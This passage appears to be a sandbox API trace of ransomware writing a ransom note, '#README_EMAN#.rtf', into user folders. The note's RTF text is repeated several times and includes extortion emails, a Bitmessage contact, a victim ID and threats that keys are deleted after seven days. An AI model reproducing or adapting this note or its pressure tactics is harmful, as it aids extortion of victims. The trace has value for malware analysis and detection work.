\"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x9cí\x89ì'CÓì\x11÷gv\x13\x07", lpUsedDefaultChar=0x0) returned 8717 [0298.829] WriteFile (in: hFile=0x27c, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.830] CloseHandle (hObject=0x27c) returned 1 [0298.830] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kok\\#readme_eman#.rtf")) returned 0xffffffff [0298.830] GetLastError () returned 0x2 [0298.830] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kok\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.831] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.831] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.831] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 